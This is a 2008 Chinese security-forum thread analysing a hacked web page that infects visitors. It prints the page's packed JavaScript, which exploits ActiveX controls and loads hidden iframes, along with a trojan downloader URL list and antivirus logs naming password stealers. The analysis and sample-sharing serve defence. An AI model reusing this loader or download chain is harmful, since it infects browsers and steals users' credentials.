查看: 6131|回复: 21
收起左侧

[病毒样本] http://dealer.gobee.cn/test/5.html马马来了, 不知那个命令生成的

[复制链接]
qqq000@qq.com
头像被屏蔽
发表于 2008-2-28 12:39:26 | 显示全部楼层 |阅读模式
http://dealer.gobee.cn/test/5.html马马来了, 不知那个命令生成的




===========
go 16:56:56
唉。。。。。。。。。不知道为什么检测不到病毒。。惊惶中。。。
凝逸 16:57:25
系统有补丁
凝逸 16:57:39
你用一个 没补丁机子上看
凝逸 16:57:47
http://bbs.kafan.cn/viewthread.php?tid=210290&extra=page%3D1
go 17:04:33
是不是打了补丁就会没事?
凝逸 17:05:22
但 上你网站的机子, 不会 都有补丁
凝逸 17:05:31
你不中 他们会中
go 17:05:42
我们公司的都打了。。。
凝逸 17:05:56
http://bbs.kafan.cn/viewthread.php?tid=210290&extra=page%3D1 看了吗
go 17:07:11
已经K了那广告了~我们现在已经没毒了~
go 17:09:07
麻烦你把那贴的地址改一下~如果你们要测试
可以用http://dealer.gobee.cn/test/5.html
这个地址
go 17:09:47
还有我想问问是不是打了补丁杀毒软件检测不到了?
凝逸 17:10:37
y
go 17:12:12
还有贴那里要改啊~不然会影响我们网站的~别人会以为我们放马的,我们都是受害者~
凝逸 17:14:05
不会 , 放马是计数网站或计数网站让马挂

[ 本帖最后由 qqq000@qq.com 于 2008-2-28 04:16 编辑 ]
qqq000@qq.com
头像被屏蔽
 楼主| 发表于 2008-2-28 12:40:34 | 显示全部楼层
我只查到 left.gif count_20[1].htm

[ 本帖最后由 qqq000@qq.com 于 2008-2-28 04:15 编辑 ]
qqq000@qq.com
头像被屏蔽
 楼主| 发表于 2008-2-28 12:46:48 | 显示全部楼层
<script>function init(){document.write();}window.onload = init;</script>
<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6(2.z.R(\'v\')==-1){9{0 e;0 j=(2.F("4"));j.H("I","J:N-T-M-L-O"+"P");0 S=j.Q("K.C","")}8(e){};b{0 5=c B();5.A(5.D()+E*w*w*G);2.z=\'v=X;18=/;5=\'+5.1a();6(e!="[4 7]"){2.a("<3 m=q:r i=d://s.p.o/l/14.n></3>")}17{9{0 f;0 19=c k("t.t.1")}8(f){};b{6(f!="[4 7]"){2.a("<3 m=q:r i=d://s.p.o/l/13.n></3>")}}9{0 g;0 y=c k("12.U.1")}8(g){};b{6(g!="[4 7]"){2.a("<u W=V i=d:\\/\\/x\\/Y\\/y.Z><\\/u>")}}9{0 h;0 11=c k("10.16.1")}8(h){};b{6(h!="[4 7]"){2.a("<3 m=q:r i=d://s.p.o/l/15.n></3>")}}}}}',62,73,'var||document|iframe|object|expires|if|Error|catch|try|write|finally|new|http|||||src|ado|ActiveXObject|pic|style|gif|com|51yse|display|none|count|IERPCtl|script|OK|60||pps|cookie|setTime|Date|Stream|getTime|24|createElement|1000|setAttribute|classid|clsid|Adodb|983A|11D0|BD96C556|00C04FC|29E36|createobject|indexOf|as|65A3|PowerPlayerCtrl|javascript|language|Yes|mm|js|GLCHAT|ourgame|POWERPLAYER|logo|left|head|GLChatCtrl|else|path|storm|toGMTString'.split('|'),0,{}))
</script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1589345.js"></script>
dikex
发表于 2008-2-28 13:00:40 | 显示全部楼层
Log is generated by FreShow.
    [script]http://ads.adlianmeng.com.cn/gobee.asp?tid68652&gco=&ses=&crn=&adss=&ptc=&loo=   (referer检测,使用http://www.gobee.cn/)
        [frame]http://count.51yse.com/pic/count_20.htm
            [frame]http://count.51yse.com/pic/left.gif
            [frame]http://count.51yse.com/pic/logo.gif
            [script]http://x/mm/pps.js   (奇怪的东西)
            [frame]http://count.51yse.com/pic/head.gif
                [object]http://www.52gol.com/xx.exe

[ 本帖最后由 dikex 于 2008-2-28 13:01 编辑 ]
Palkia
发表于 2008-2-28 13:05:04 | 显示全部楼层
C:\Documents and Settings\Administrator\桌面\xx.exe        Heuri.Suspicious.ERNM        启发式扫描        还未处理
zzh161
发表于 2008-2-28 13:07:51 | 显示全部楼层
又是计数的被挂?



xx.txt
[MAIN]
VERSION=2008-2-3

[URL]
1=hxxp://www.52gol.com/xx/1.exe
2=hxxp://www.52gol.com/xx/2.exe
3=hxxp://www.52gol.com/xx/3.exe
4=hxxp://www.52gol.com/xx/4.exe
5=hxxp://www.52gol.com/xx/5.exe
6=hxxp://www.52gol.com/xx/6.exe
7=hxxp://www.52gol.com/xx/7.exe
8=hxxp://www.52gol.com/xx/8.exe
9=hxxp://www.52gol.com/xx/9.exe
10=hxxp://www.52gol.com/xx/10.exe
11=hxxp://www.52gol.com/xx/11.exe
12=hxxp://www.52gol.com/xx/12.exe
13=hxxp://www.52gol.com/xx/13.exe
14=hxxp://www.52gol.com/xx/14.exe
15=hxxp://www.52gol.com/xx/15.exe
16=hxxp://www.52gol.com/xx/16.exe
17=hxxp://www.52gol.com/xx/17.exe
18=hxxp://www.52gol.com/xx/18.exe
19=hxxp://www.52gol.com/xx/19.exe
20=hxxp://www.52gol.com/xx/20.exe
21=hxxp://www.52gol.com/xx/21.exe
22=hxxp://www.52gol.com/xx/22.exe
23=hxxp://www.52gol.com/xx/23.exe
24=hxxp://www.52gol.com/xx/24.exe
25=hxxp://www.52gol.com/xx/25.exe
26=hxxp://www.52gol.com/xx/26.exe
27=hxxp://www.52gol.com/xx/27.exe
28=hxxp://www.52gol.com/xx/28.exe
29=hxxp://www.52gol.com/xx/29.exe
30=hxxp://www.52gol.com/xx/30.exe


样本:

[ 本帖最后由 zzh161 于 2008-2-28 13:20 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
xqiafl
发表于 2008-2-28 13:47:19 | 显示全部楼层
很好,很强大!
欠妳緈諨
发表于 2008-2-28 13:54:52 | 显示全部楼层
D:\病毒测试\未解压样本\xx.rar » RAR » 11\1.exe - probably a variant of Win32/Genetik trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\10.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\11.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\12.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\13.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\14.exe - a variant of Win32/PSW.OnLineGames.NML trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\15.exe - a variant of Win32/PSW.OnLineGames.NML trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\16.exe - a variant of Win32/PSW.OnLineGames.NML trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\17.exe - Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\18.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\19.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\2.exe - probably a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\20.exe - Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\21.exe - Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\23.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\24.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\25.exe - probably a variant of Win32/Genetik trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\3.exe - probably a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\4.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\5.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\6.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\7.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\8.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\9.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
曲中求
发表于 2008-2-28 14:28:46 | 显示全部楼层
Scan Log
Version of virus signature database: 2907 (20080228)
Date: 2008-2-28  Time: 14:27:08
Scanned disks, folders and files: C:\Documents and Settings\Administrator\桌面\xx.rar
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\1.exe - probably a variant of Win32/Genetik trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\10.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\11.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\12.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\13.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\14.exe - a variant of Win32/PSW.OnLineGames.NML trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\15.exe - a variant of Win32/PSW.OnLineGames.NML trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\16.exe - a variant of Win32/PSW.OnLineGames.NML trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\17.exe - Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\18.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\19.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\2.exe - probably a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\20.exe - Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\21.exe - Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\23.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\24.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\25.exe - probably a variant of Win32/Genetik trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\3.exe - probably a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\4.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\5.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\6.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\7.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\8.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
C:\Documents and Settings\Administrator\桌面\xx.rar &raquo; RAR &raquo; 11\9.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
Number of scanned objects: 26
Number of threats found: 24
Time of completion: 14:27:19  Total scanning time: 11 sec (00:00:11)
hahacomcn
发表于 2008-2-28 14:41:43 | 显示全部楼层
看到beta5 的计数,真难受啊

Begin scan in 'C:\Documents and Settings\haha\桌面\xx.rar'
C:\Documents and Settings\haha\桌面\xx.rar
  [0] Archive type: RAR
    --> 11\1.exe
          [DETECTION] Is the Trojan horse TR/Drop.Agent.djg.2
  --> 11\10.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnLineGame.XO
    --> 11\11.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
          --> Object
            [4] Archive type: RSRC
            --> Object
                [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.pmi.12
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
    --> 11\12.exe
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
    --> 11\13.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
          --> Object
            [4] Archive type: RSRC
            --> Object
                [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rti.1
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
  --> 11\14.exe
      [DETECTION] Is the Trojan horse TR/BHO.aya.1
    --> 11\15.exe
          [DETECTION] Contains suspicious code HEUR/Malware
    --> 11\16.exe
          [DETECTION] Contains suspicious code HEUR/Malware
    --> 11\17.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
          --> Object
            [4] Archive type: RSRC
            --> Object
                [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rjh.3
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
    --> 11\18.exe
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
    --> 11\19.exe
          [DETECTION] Is the Trojan horse TR/Spy.Gen
    --> 11\2.exe
          [DETECTION] Is the Trojan horse TR/Dropper.Gen
    --> 11\20.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
          --> Object
            [4] Archive type: RSRC
            --> Object
                [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rjh.9
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
    --> 11\21.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
          --> Object
            [4] Archive type: RSRC
            --> Object
                [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rjh.2
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
    --> 11\23.exe
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
    --> 11\24.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
          --> Object
            [4] Archive type: RSRC
            --> Object
                [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rti.4
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
    --> 11\25.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
            [DETECTION] Is the Trojan horse TR/PSW.Steal.44656
    --> 11\3.exe
          [DETECTION] Is the Trojan horse TR/Onlinegames.rxt
    --> 11\4.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
            [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.RSM.2
    --> 11\5.exe
          [DETECTION] Is the Trojan horse TR/Dropper.Gen
    --> 11\6.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
            [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.NSR.394
    --> 11\7.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
            [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rsl.6
    --> 11\8.exe
          [DETECTION] Is the Trojan horse TR/Spy.Gen
  --> 11\9.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnLineGame.XO
      [INFO]      A backup was created as '47f4581d.qua'  ( QUARANTINE )


End of the scan: 2008年2月28日  14:41
Used time: 00:04 min

The scan has been done completely.

      0 Scanning directories
     26 Files were scanned
     28 viruses and/or unwanted programs were found
      5 Files were classified as suspicious:
      0 files were deleted
      0 files were repaired
      1 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
     -2 Files not concerned
      1 Archives were scanned
      0 Warnings
      0 Notes
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-12-17 10:42 , Processed in 0.231088 second(s), 2 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表